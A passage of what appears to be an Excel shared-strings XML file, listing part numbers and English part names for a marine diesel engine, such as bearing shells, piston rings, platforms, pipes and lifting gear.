    <t>107.354.094</t>
  </si>
  <si>
    <t>107.344.773</t>
  </si>
  <si>
    <t>107.091.979</t>
  </si>
  <si>
    <t>107.384.985</t>
  </si>
  <si>
    <t>107.348.761</t>
  </si>
  <si>
    <t>107.399.984</t>
  </si>
  <si>
    <t>107.141.229</t>
  </si>
  <si>
    <t>107.388.205</t>
  </si>
  <si>
    <t>DAAD018319</t>
  </si>
  <si>
    <t>DAAD018331</t>
  </si>
  <si>
    <t>107.143.617</t>
  </si>
  <si>
    <t>107.386.739</t>
  </si>
  <si>
    <t>107.354.915</t>
  </si>
  <si>
    <t>DAAD018289</t>
  </si>
  <si>
    <t>107.345.651</t>
  </si>
  <si>
    <t>107.275.285</t>
  </si>
  <si>
    <t>107.275.286</t>
  </si>
  <si>
    <t>107.068.488</t>
  </si>
  <si>
    <t>107.406.530</t>
  </si>
  <si>
    <t>107.270.032</t>
  </si>
  <si>
    <t>107.351.530</t>
  </si>
  <si>
    <t>107.280.075</t>
  </si>
  <si>
    <t>107.343.950</t>
  </si>
  <si>
    <t>107.395.698</t>
  </si>
  <si>
    <t>107.382.404</t>
  </si>
  <si>
    <t>107.358.562</t>
  </si>
  <si>
    <t>107.351.942</t>
  </si>
  <si>
    <t>107.399.097</t>
  </si>
  <si>
    <t>107.351.503</t>
  </si>
  <si>
    <t>107.351.480</t>
  </si>
  <si>
    <t>107.398.669</t>
  </si>
  <si>
    <t>107.351.391</t>
  </si>
  <si>
    <t>107.070.301</t>
  </si>
  <si>
    <t>107.093.786</t>
  </si>
  <si>
    <t>107.213.759</t>
  </si>
  <si>
    <t>107.331.576</t>
  </si>
  <si>
    <t>107.332.786</t>
  </si>
  <si>
    <t>107.138.800</t>
  </si>
  <si>
    <t>DAAD041029</t>
  </si>
  <si>
    <t>DAAD013735</t>
  </si>
  <si>
    <t>107.430.868</t>
  </si>
  <si>
    <t>107.090.943</t>
  </si>
  <si>
    <t>107.296.760</t>
  </si>
  <si>
    <t>107.093.185</t>
  </si>
  <si>
    <t>107.345.326</t>
  </si>
  <si>
    <t>107.345.330</t>
  </si>
  <si>
    <t>107.345.329</t>
  </si>
  <si>
    <t>107.345.328</t>
  </si>
  <si>
    <t>107.351.136</t>
  </si>
  <si>
    <t>107.431.454</t>
  </si>
  <si>
    <t>107.047.448</t>
  </si>
  <si>
    <t>107.317.733</t>
  </si>
  <si>
    <t>107.345.848</t>
  </si>
  <si>
    <t>107.290.030</t>
  </si>
  <si>
    <t>107.345.849</t>
  </si>
  <si>
    <t>107.425.855</t>
  </si>
  <si>
    <t>107.425.499</t>
  </si>
  <si>
    <t>107.200.146</t>
  </si>
  <si>
    <t>107.332.010</t>
  </si>
  <si>
    <t>107.285.739</t>
  </si>
  <si>
    <t>107.156.087</t>
  </si>
  <si>
    <t>107.285.743</t>
  </si>
  <si>
    <t>107.284.750</t>
  </si>
  <si>
    <t>107.284.751</t>
  </si>
  <si>
    <t>107.124.842</t>
  </si>
  <si>
    <t>107.216.514</t>
  </si>
  <si>
    <t>107.275.280</t>
  </si>
  <si>
    <t>107.196.542</t>
  </si>
  <si>
    <t>107.048.175</t>
  </si>
  <si>
    <t>107.218.416</t>
  </si>
  <si>
    <t>107.120.988</t>
  </si>
  <si>
    <t>107.239.410</t>
  </si>
  <si>
    <t>107.218.414</t>
  </si>
  <si>
    <t>107.218.433</t>
  </si>
  <si>
    <t>107.239.408</t>
  </si>
  <si>
    <t>107.218.850</t>
  </si>
  <si>
    <t>107.350.972</t>
  </si>
  <si>
    <t>107.350.970</t>
  </si>
  <si>
    <t>107.375.292</t>
  </si>
  <si>
    <t>107.349.963</t>
  </si>
  <si>
    <t>107.094.911</t>
  </si>
  <si>
    <t>107.326.168</t>
  </si>
  <si>
    <t>107.326.203</t>
  </si>
  <si>
    <t>107.393.236</t>
  </si>
  <si>
    <t>107.038.830</t>
  </si>
  <si>
    <t>107.038.833</t>
  </si>
  <si>
    <t>107.038.834</t>
  </si>
  <si>
    <t>107.346.707</t>
  </si>
  <si>
    <t>107.344.494</t>
  </si>
  <si>
    <t>107.343.648</t>
  </si>
  <si>
    <t>107.343.543</t>
  </si>
  <si>
    <t>107.342.990</t>
  </si>
  <si>
    <t>107.084.872</t>
  </si>
  <si>
    <t>107.083.254</t>
  </si>
  <si>
    <t>107.343.006</t>
  </si>
  <si>
    <t>107.344.119</t>
  </si>
  <si>
    <t>107.344.735</t>
  </si>
  <si>
    <t>107.344.731</t>
  </si>
  <si>
    <t>107.344.311</t>
  </si>
  <si>
    <t>DAAD013823</t>
  </si>
  <si>
    <t>107.342.913</t>
  </si>
  <si>
    <t>107.342.499</t>
  </si>
  <si>
    <t>107.346.928</t>
  </si>
  <si>
    <t>107.391.265</t>
  </si>
  <si>
    <t>107.344.767</t>
  </si>
  <si>
    <t>107.321.034</t>
  </si>
  <si>
    <t>107.321.029</t>
  </si>
  <si>
    <t>107.385.500</t>
  </si>
  <si>
    <t>107.321.030</t>
  </si>
  <si>
    <t>107.344.299</t>
  </si>
  <si>
    <t>107.346.313</t>
  </si>
  <si>
    <t>107.321.033</t>
  </si>
  <si>
    <t>107.321.009</t>
  </si>
  <si>
    <t>107.372.373</t>
  </si>
  <si>
    <t>107.321.019</t>
  </si>
  <si>
    <t>107.321.021</t>
  </si>
  <si>
    <t>107.321.022</t>
  </si>
  <si>
    <t>107.321.057</t>
  </si>
  <si>
    <t>107.123.493</t>
  </si>
  <si>
    <t>107.267.531</t>
  </si>
  <si>
    <t>107.321.041</t>
  </si>
  <si>
    <t>107.347.443</t>
  </si>
  <si>
    <t>DAAD014995</t>
  </si>
  <si>
    <t>107.321.016</t>
  </si>
  <si>
    <t>107.346.161</t>
  </si>
  <si>
    <t>107.345.026</t>
  </si>
  <si>
    <t>107.338.018</t>
  </si>
  <si>
    <t>107.337.897</t>
  </si>
  <si>
    <t>107.347.511</t>
  </si>
  <si>
    <t>107.347.234</t>
  </si>
  <si>
    <t>107.131.612</t>
  </si>
  <si>
    <t>107.345.739</t>
  </si>
  <si>
    <t>107.354.985</t>
  </si>
  <si>
    <t>DAAD040992</t>
  </si>
  <si>
    <t>107.345.820</t>
  </si>
  <si>
    <t>DAAD011673</t>
  </si>
  <si>
    <t>107.341.525</t>
  </si>
  <si>
    <t>107.348.398</t>
  </si>
  <si>
    <t>107.346.165</t>
  </si>
  <si>
    <t>107.397.135</t>
  </si>
  <si>
    <t>107.363.628</t>
  </si>
  <si>
    <t>107.018.924</t>
  </si>
  <si>
    <t>107.381.295</t>
  </si>
  <si>
    <t>107.363.700</t>
  </si>
  <si>
    <t>107.018.925</t>
  </si>
  <si>
    <t>107.371.768</t>
  </si>
  <si>
    <t>107.399.337</t>
  </si>
  <si>
    <t>107.331.765</t>
  </si>
  <si>
    <t>107.334.950</t>
  </si>
  <si>
    <t>107.331.616</t>
  </si>
  <si>
    <t>107.331.612</t>
  </si>
  <si>
    <t>107.334.688</t>
  </si>
  <si>
    <t>107.334.928</t>
  </si>
  <si>
    <t>107.390.245</t>
  </si>
  <si>
    <t>107.335.238</t>
  </si>
  <si>
    <t>107.338.585</t>
  </si>
  <si>
    <t>DAAD008663</t>
  </si>
  <si>
    <t>107.324.702</t>
  </si>
  <si>
    <t>107.296.755</t>
  </si>
  <si>
    <t>107.109.953</t>
  </si>
  <si>
    <t>DAAD041753</t>
  </si>
  <si>
    <t>107.346.284</t>
  </si>
  <si>
    <t>107.324.113</t>
  </si>
  <si>
    <t>DAAD006199</t>
  </si>
  <si>
    <t>107.409.043</t>
  </si>
  <si>
    <t>DAAD006533</t>
  </si>
  <si>
    <t>107.012.660</t>
  </si>
  <si>
    <t>107.346.903</t>
  </si>
  <si>
    <t>DAAD041850</t>
  </si>
  <si>
    <t>107.324.103</t>
  </si>
  <si>
    <t>DAAD027717</t>
  </si>
  <si>
    <t>DAAD027715</t>
  </si>
  <si>
    <t>DAAD000080</t>
  </si>
  <si>
    <t>DAAD000093</t>
  </si>
  <si>
    <t>107.425.440</t>
  </si>
  <si>
    <t>107.386.239</t>
  </si>
  <si>
    <t>107.338.205</t>
  </si>
  <si>
    <t>107.392.790</t>
  </si>
  <si>
    <t>DAAD024323</t>
  </si>
  <si>
    <t>107.392.764</t>
  </si>
  <si>
    <t>107.392.741</t>
  </si>
  <si>
    <t>107.397.953</t>
  </si>
  <si>
    <t>107.371.153</t>
  </si>
  <si>
    <t>107.397.884</t>
  </si>
  <si>
    <t>DAAT002889</t>
  </si>
  <si>
    <t>DAAT002866</t>
  </si>
  <si>
    <t>DAAT003161</t>
  </si>
  <si>
    <t>107.427.627</t>
  </si>
  <si>
    <t>107.431.656</t>
  </si>
  <si>
    <t>107.337.940</t>
  </si>
  <si>
    <t>107.114.843</t>
  </si>
  <si>
    <t>DAAT004498</t>
  </si>
  <si>
    <t>DAAD044283</t>
  </si>
  <si>
    <t>107.351.550</t>
  </si>
  <si>
    <t>107.351.970</t>
  </si>
  <si>
    <t>107.351.462</t>
  </si>
  <si>
    <t>107.351.573</t>
  </si>
  <si>
    <t>107.391.471</t>
  </si>
  <si>
    <t>107.391.522</t>
  </si>
  <si>
    <t>107.391.524</t>
  </si>
  <si>
    <t>107.405.976</t>
  </si>
  <si>
    <t>107.402.558</t>
  </si>
  <si>
    <t>107.431.302</t>
  </si>
  <si>
    <t>107.314.190</t>
  </si>
  <si>
    <t>107.374.486</t>
  </si>
  <si>
    <t>W5070319</t>
  </si>
  <si>
    <t>107.374.446</t>
  </si>
  <si>
    <t>W5070231</t>
  </si>
  <si>
    <t>W5070251</t>
  </si>
  <si>
    <t>W5070232</t>
  </si>
  <si>
    <t>107.392.412</t>
  </si>
  <si>
    <t>DAAD046792</t>
  </si>
  <si>
    <t>W5070337</t>
  </si>
  <si>
    <t>DAAD041734</t>
  </si>
  <si>
    <t>DAAD905674</t>
  </si>
  <si>
    <t>107.287.969</t>
  </si>
  <si>
    <t>DAAT003441</t>
  </si>
  <si>
    <t>DAAT004540</t>
  </si>
  <si>
    <t>DAAT004508</t>
  </si>
  <si>
    <t>DAAD049822</t>
  </si>
  <si>
    <t>DAAD007749</t>
  </si>
  <si>
    <t>107.301.003</t>
  </si>
  <si>
    <t>107.348.855</t>
  </si>
  <si>
    <t>107.370.185</t>
  </si>
  <si>
    <t>DAAD046435</t>
  </si>
  <si>
    <t>DAAD007541</t>
  </si>
  <si>
    <t>DAAD045560</t>
  </si>
  <si>
    <t>DAAD046445</t>
  </si>
  <si>
    <t>DAAD029248</t>
  </si>
  <si>
    <t>DAAD017741</t>
  </si>
  <si>
    <t>DAAD018661</t>
  </si>
  <si>
    <t>107.404.330</t>
  </si>
  <si>
    <t>107.324.102</t>
  </si>
  <si>
    <t>107.324.230</t>
  </si>
  <si>
    <t>107.324.206</t>
  </si>
  <si>
    <t>107.348.593</t>
  </si>
  <si>
    <t>DAAT003274</t>
  </si>
  <si>
    <t>107.338.694</t>
  </si>
  <si>
    <t>107.371.267</t>
  </si>
  <si>
    <t>DAAD043123</t>
  </si>
  <si>
    <t>DAAD043122</t>
  </si>
  <si>
    <t>DAAD042665</t>
  </si>
  <si>
    <t>107.324.110</t>
  </si>
  <si>
    <t>DAAD042656</t>
  </si>
  <si>
    <t>DAAD042637</t>
  </si>
  <si>
    <t>DAAD042636</t>
  </si>
  <si>
    <t>107.011.710</t>
  </si>
  <si>
    <t>107.214.349</t>
  </si>
  <si>
    <t>107.311.170</t>
  </si>
  <si>
    <t>107.311.968</t>
  </si>
  <si>
    <t>DAAD043095</t>
  </si>
  <si>
    <t>107.423.272</t>
  </si>
  <si>
    <t>107.202.711</t>
  </si>
  <si>
    <t>107.358.043</t>
  </si>
  <si>
    <t>107.349.534</t>
  </si>
  <si>
    <t>DAAD022785</t>
  </si>
  <si>
    <t>107.367.921</t>
  </si>
  <si>
    <t>107.348.105</t>
  </si>
  <si>
    <t>107.358.459</t>
  </si>
  <si>
    <t>DAAD012317</t>
  </si>
  <si>
    <t>DAAD012386</t>
  </si>
  <si>
    <t>107.324.108</t>
  </si>
  <si>
    <t>DAAT003851</t>
  </si>
  <si>
    <t>DAAT003852</t>
  </si>
  <si>
    <t>107.393.538</t>
  </si>
  <si>
    <t>107.393.566</t>
  </si>
  <si>
    <t>107.392.769</t>
  </si>
  <si>
    <t>107.393.578</t>
  </si>
  <si>
    <t>107.392.921</t>
  </si>
  <si>
    <t>107.388.889</t>
  </si>
  <si>
    <t>107.392.917</t>
  </si>
  <si>
    <t>107.393.551</t>
  </si>
  <si>
    <t>107.333.148</t>
  </si>
  <si>
    <t>107.401.958</t>
  </si>
  <si>
    <t>107.344.553</t>
  </si>
  <si>
    <t>107.324.150</t>
  </si>
  <si>
    <t>107.372.088</t>
  </si>
  <si>
    <t>DAAT003308</t>
  </si>
  <si>
    <t>107.367.346</t>
  </si>
  <si>
    <t>107.397.099</t>
  </si>
  <si>
    <t>107.367.183</t>
  </si>
  <si>
    <t>107.364.891</t>
  </si>
  <si>
    <t>107.329.051</t>
  </si>
  <si>
    <t>107.324.804</t>
  </si>
  <si>
    <t>107.093.833</t>
  </si>
  <si>
    <t>107.359.015</t>
  </si>
  <si>
    <t>107.126.164</t>
  </si>
  <si>
    <t>107.357.181</t>
  </si>
  <si>
    <t>DAAD902648</t>
  </si>
  <si>
    <t>107.411.237</t>
  </si>
  <si>
    <t>107.266.386</t>
  </si>
  <si>
    <t>107.327.096</t>
  </si>
  <si>
    <t>107.327.091</t>
  </si>
  <si>
    <t>107.412.102</t>
  </si>
  <si>
    <t>DAAT003916</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>107.047.934</t>
  </si>
  <si>
    <t>107.109.347</t>
  </si>
  <si>
    <t>107.144.683</t>
  </si>
  <si>
    <t>107.112.948</t>
  </si>
  <si>
    <t>107.286.578</t>
  </si>
  <si>
    <t>107.265.346</t>
  </si>
  <si>
    <t>107.134.169</t>
  </si>
  <si>
    <t>107.109.226</t>
  </si>
  <si>
    <t>107.336.757</t>
  </si>
  <si>
    <t>107.336.773</t>
  </si>
  <si>
    <t>107.269.555</t>
  </si>
  <si>
    <t>107.359.690</t>
  </si>
  <si>
    <t>107.013.828</t>
  </si>
  <si>
    <t>107.009.748</t>
  </si>
  <si>
    <t>107.235.153</t>
  </si>
  <si>
    <t>107.235.152</t>
  </si>
  <si>
    <t>107.350.116</t>
  </si>
  <si>
    <t>107.412.458</t>
  </si>
  <si>
    <t>DAAD023059</t>
  </si>
  <si>
    <t>107.394.576</t>
  </si>
  <si>
    <t>107.350.471</t>
  </si>
  <si>
    <t>107.341.141</t>
  </si>
  <si>
    <t>107.349.104</t>
  </si>
  <si>
    <t>107.038.831</t>
  </si>
  <si>
    <t>DAAD045406</t>
  </si>
  <si>
    <t>DAAD022613</t>
  </si>
  <si>
    <t>107.038.886</t>
  </si>
  <si>
    <t>DAAD022666</t>
  </si>
  <si>
    <t>DAAD022705</t>
  </si>
  <si>
    <t>107.352.547</t>
  </si>
  <si>
    <t>DAAD046382</t>
  </si>
  <si>
    <t>DAAD043051</t>
  </si>
  <si>
    <t>107.352.955</t>
  </si>
  <si>
    <t>107.397.724</t>
  </si>
  <si>
    <t>W8290169</t>
  </si>
  <si>
    <t>107.112.793</t>
  </si>
  <si>
    <t>107.266.287</t>
  </si>
  <si>
    <t>107.262.547</t>
  </si>
  <si>
    <t>107.364.358</t>
  </si>
  <si>
    <t>107.262.583</t>
  </si>
  <si>
    <t>107.261.459</t>
  </si>
  <si>
    <t>107.325.891</t>
  </si>
  <si>
    <t>107.338.592</t>
  </si>
  <si>
    <t>107.325.893</t>
  </si>
  <si>
    <t>107.348.651</t>
  </si>
  <si>
    <t>107.374.447</t>
  </si>
  <si>
    <t>107.337.243</t>
  </si>
  <si>
    <t>107.374.689</t>
  </si>
  <si>
    <t>107.355.274</t>
  </si>
  <si>
    <t>107.359.092</t>
  </si>
  <si>
    <t>107.351.771</t>
  </si>
  <si>
    <t>107.346.714</t>
  </si>
  <si>
    <t>107.356.184</t>
  </si>
  <si>
    <t>107.356.115</t>
  </si>
  <si>
    <t>107.272.878</t>
  </si>
  <si>
    <t>107.353.557</t>
  </si>
  <si>
    <t>107.074.837</t>
  </si>
  <si>
    <t>107.114.995</t>
  </si>
  <si>
    <t>107.235.317</t>
  </si>
  <si>
    <t>107.272.883</t>
  </si>
  <si>
    <t>107.272.831</t>
  </si>
  <si>
    <t>107.351.174</t>
  </si>
  <si>
    <t>107.274.674</t>
  </si>
  <si>
    <t>107.289.224</t>
  </si>
  <si>
    <t>107.325.055</t>
  </si>
  <si>
    <t>107.310.675</t>
  </si>
  <si>
    <t>107.289.223</t>
  </si>
  <si>
    <t>107.310.687</t>
  </si>
  <si>
    <t>107.310.674</t>
  </si>
  <si>
    <t>107.351.543</t>
  </si>
  <si>
    <t>107.156.875</t>
  </si>
  <si>
    <t>107.156.874</t>
  </si>
  <si>
    <t>107.355.350</t>
  </si>
  <si>
    <t>107.328.460</t>
  </si>
  <si>
    <t>DAAD043164</t>
  </si>
  <si>
    <t>107.356.144</t>
  </si>
  <si>
    <t>107.355.882</t>
  </si>
  <si>
    <t>DAAD015275</t>
  </si>
  <si>
    <t>107.312.462</t>
  </si>
  <si>
    <t>107.312.463</t>
  </si>
  <si>
    <t>107.189.426</t>
  </si>
  <si>
    <t>107.189.390</t>
  </si>
  <si>
    <t>107.068.487</t>
  </si>
  <si>
    <t>107.189.073</t>
  </si>
  <si>
    <t>107.312.467</t>
  </si>
  <si>
    <t>107.398.030</t>
  </si>
  <si>
    <t>107.398.000</t>
  </si>
  <si>
    <t>107.356.102</t>
  </si>
  <si>
    <t>107.340.744</t>
  </si>
  <si>
    <t>107.348.709</t>
  </si>
  <si>
    <t>107.351.256</t>
  </si>
  <si>
    <t>107.350.986</t>
  </si>
  <si>
    <t>DAAD024673</t>
  </si>
  <si>
    <t>107.404.536</t>
  </si>
  <si>
    <t>107.404.737</t>
  </si>
  <si>
    <t>107.272.862</t>
  </si>
  <si>
    <t>107.074.639</t>
  </si>
  <si>
    <t>107.348.044</t>
  </si>
  <si>
    <t>107.019.162</t>
  </si>
  <si>
    <t>107.286.024</t>
  </si>
  <si>
    <t>DAAD020059</t>
  </si>
  <si>
    <t>DAAD020046</t>
  </si>
  <si>
    <t>107.353.300</t>
  </si>
  <si>
    <t>107.353.297</t>
  </si>
  <si>
    <t>107.348.417</t>
  </si>
  <si>
    <t>107.114.630</t>
  </si>
  <si>
    <t>107.350.792</t>
  </si>
  <si>
    <t>107.350.319</t>
  </si>
  <si>
    <t>107.315.289</t>
  </si>
  <si>
    <t>107.346.728</t>
  </si>
  <si>
    <t>DAAD036490</t>
  </si>
  <si>
    <t>107.348.650</t>
  </si>
  <si>
    <t>107.349.388</t>
  </si>
  <si>
    <t>107.348.907</t>
  </si>
  <si>
    <t>107.345.863</t>
  </si>
  <si>
    <t>107.345.836</t>
  </si>
  <si>
    <t>107.345.840</t>
  </si>
  <si>
    <t>107.346.028</t>
  </si>
  <si>
    <t>DAAD006931</t>
  </si>
  <si>
    <t>W5090009</t>
  </si>
  <si>
    <t>107.362.692</t>
  </si>
  <si>
    <t>W5090108</t>
  </si>
  <si>
    <t>107.223.848</t>
  </si>
  <si>
    <t>107.223.846</t>
  </si>
  <si>
    <t>107.362.649</t>
  </si>
  <si>
    <t>DAAD049438</t>
  </si>
  <si>
    <t>DAAD049427</t>
  </si>
  <si>
    <t>DAAD049431</t>
  </si>
  <si>
    <t>107.074.657</t>
  </si>
  <si>
    <t>107.019.324</t>
  </si>
  <si>
    <t>107.348.782</t>
  </si>
  <si>
    <t>107.353.675</t>
  </si>
  <si>
    <t>107.353.673</t>
  </si>
  <si>
    <t>107.348.229</t>
  </si>
  <si>
    <t>107.349.417</t>
  </si>
  <si>
    <t>107.351.761</t>
  </si>
  <si>
    <t>107.346.945</t>
  </si>
  <si>
    <t>107.346.982</t>
  </si>
  <si>
    <t>107.347.063</t>
  </si>
  <si>
    <t>107.347.046</t>
  </si>
  <si>
    <t>107.345.063</t>
  </si>
  <si>
    <t>107.343.242</t>
  </si>
  <si>
    <t>107.375.103</t>
  </si>
  <si>
    <t>107.298.810</t>
  </si>
  <si>
    <t>107.177.601</t>
  </si>
  <si>
    <t>107.403.708</t>
  </si>
  <si>
    <t>107.352.090</t>
  </si>
  <si>
    <t>107.352.621</t>
  </si>
  <si>
    <t>DAAD014227</t>
  </si>
  <si>
    <t>107.354.687</t>
  </si>
  <si>
    <t>107.345.941</t>
  </si>
  <si>
    <t>107.345.928</t>
  </si>
  <si>
    <t>107.345.933</t>
  </si>
  <si>
    <t>107.370.862</t>
  </si>
  <si>
    <t>107.321.111</t>
  </si>
  <si>
    <t>107.406.880</t>
  </si>
  <si>
    <t>107.356.132</t>
  </si>
  <si>
    <t>107.375.274</t>
  </si>
  <si>
    <t>107.346.035</t>
  </si>
  <si>
    <t>107.320.197</t>
  </si>
  <si>
    <t>107.320.206</t>
  </si>
  <si>
    <t>107.320.209</t>
  </si>
  <si>
    <t>107.351.950</t>
  </si>
  <si>
    <t>107.351.957</t>
  </si>
  <si>
    <t>DAAD043180</t>
  </si>
  <si>
    <t>107.364.908</t>
  </si>
  <si>
    <t>107.342.299</t>
  </si>
  <si>
    <t>107.356.370</t>
  </si>
  <si>
    <t>107.430.226</t>
  </si>
  <si>
    <t>107.430.229</t>
  </si>
  <si>
    <t>107.395.353</t>
  </si>
  <si>
    <t>107.399.324</t>
  </si>
  <si>
    <t>107.397.070</t>
  </si>
  <si>
    <t>107.422.188</t>
  </si>
  <si>
    <t>107.361.983</t>
  </si>
  <si>
    <t>107.394.151</t>
  </si>
  <si>
    <t>107.394.341</t>
  </si>
  <si>
    <t>107.394.380</t>
  </si>
  <si>
    <t>DAAD051602</t>
  </si>
  <si>
    <t>DAAD051601</t>
  </si>
  <si>
    <t>DAAD051604</t>
  </si>
  <si>
    <t>107.368.561</t>
  </si>
  <si>
    <t>107.368.121</t>
  </si>
  <si>
    <t>107.349.969</t>
  </si>
  <si>
    <t>107.352.055</t>
  </si>
  <si>
    <t>107.208.135</t>
  </si>
  <si>
    <t>107.261.774</t>
  </si>
  <si>
    <t>107.068.732</t>
  </si>
  <si>
    <t>107.262.539</t>
  </si>
  <si>
    <t>107.139.110</t>
  </si>
  <si>
    <t>107.412.454</t>
  </si>
  <si>
    <t>107.369.068</t>
  </si>
  <si>
    <t>107.038.832</t>
  </si>
  <si>
    <t>107.369.067</t>
  </si>
  <si>
    <t>107.366.249</t>
  </si>
  <si>
    <t>107.365.847</t>
  </si>
  <si>
    <t>107.365.848</t>
  </si>
  <si>
    <t>107.365.850</t>
  </si>
  <si>
    <t>107.387.008</t>
  </si>
  <si>
    <t>107.404.952</t>
  </si>
  <si>
    <t>107.398.394</t>
  </si>
  <si>
    <t>107.246.051</t>
  </si>
  <si>
    <t>107.367.119</t>
  </si>
  <si>
    <t>107.354.256</t>
  </si>
  <si>
    <t>107.353.706</t>
  </si>
  <si>
    <t>107.165.800</t>
  </si>
  <si>
    <t>107.165.808</t>
  </si>
  <si>
    <t>107.165.806</t>
  </si>
  <si>
    <t>107.165.809</t>
  </si>
  <si>
    <t>107.165.810</t>
  </si>
  <si>
    <t>107.329.413</t>
  </si>
  <si>
    <t>107.165.820</t>
  </si>
  <si>
    <t>107.165.818</t>
  </si>
  <si>
    <t>107.165.817</t>
  </si>
  <si>
    <t>107.165.822</t>
  </si>
  <si>
    <t>107.165.813</t>
  </si>
  <si>
    <t>107.340.819</t>
  </si>
  <si>
    <t>107.362.179</t>
  </si>
  <si>
    <t>107.429.532</t>
  </si>
  <si>
    <t>107.428.377</t>
  </si>
  <si>
    <t>107.425.369</t>
  </si>
  <si>
    <t>107.246.078</t>
  </si>
  <si>
    <t>107.245.935</t>
  </si>
  <si>
    <t>W5090140</t>
  </si>
  <si>
    <t>W5090123</t>
  </si>
  <si>
    <t>W5090139</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SHELL LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CERAMIC FERRULE FOR THREAD STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON COOLING/CROSSHEAD LUB.</t>
    <phoneticPr fontId="6" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL LEAKAGE PIPE ICU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNDERSLUNG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASIN PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THE DRAIN PIPE OF COAMING FOR AUTO.FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NIPPLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILTER SCREEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UPPER MAIN PLATFORM EXHAUST SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOWER MAIN PLATFORM FUEL SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADDITIONAL PLATFORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE I-GIRDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RAILING STICK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PLATFORM ASSEMBLY PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CONNECTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADD. PLATFORM ASSEMBLY PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD. AND QUAL. INSTRUCTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR. VT OF WELD SEAMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST WASTE GATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER COLLECTOR MAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">CHECKING PIPE </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLATE BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLEC MAIN CONDENSATE WATER SAC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CLIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LUBRICATION INLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLEC MAIN LEAK OIL EXH. VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JOINT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLUGGING WRENCH / RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER AND LIFTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING AND WITHDRAWING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REGRINDING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP SEAT AND CABLE DUCT ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
